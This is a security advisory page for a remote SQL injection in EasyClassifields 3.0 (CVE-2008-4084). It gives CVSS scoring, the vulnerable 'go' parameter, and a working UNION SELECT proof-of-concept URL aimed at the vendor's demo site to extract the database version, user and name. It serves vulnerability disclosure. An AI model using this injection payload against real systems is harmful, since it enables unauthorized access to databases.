Bug: EasyClassifields 3.0 (go) Remote SQL Injection Vulnerability ( Ascii Version )

Search:
WLB2

EasyClassifields 3.0 (go) Remote SQL Injection Vulnerability

Published
Credit
Risk
2008.09.17
e.wiZz!
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2008-4084
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
6.8/10
6.4/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

##############EasyClassifields v3.0 SQL Injection#######################

####By: e.wiZz!
####Info: Bosnian Idiot FTW!
####Site: infected.blogger.ba
####Greetz: Luigi,suN8Hclf,str0ke
In the wild...

##################################################################

###Script Site: http://myiosoft.com/?1.6.0.0
###Vulnerability:

http://www.inthewild.xxx/path/index.php?PageSection=x&page=browse&go=<sql>

PoC on demo site:

http://myiosoft.com/products/EasyClassifields/demo/staticpages/easyclassifields/index.php?PageSection=0&page=browse&
amp;go=-1%20union%20select%20all%20concat(0x3a,version(),0x3a,user(),0x3a,0x3a,database()),2%20from%20mysql.user

References:

http://www.securityfocus.com/bid/30943
http://www.milw0rm.com/exploits/6342
http://secunia.com/advisories/31682

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version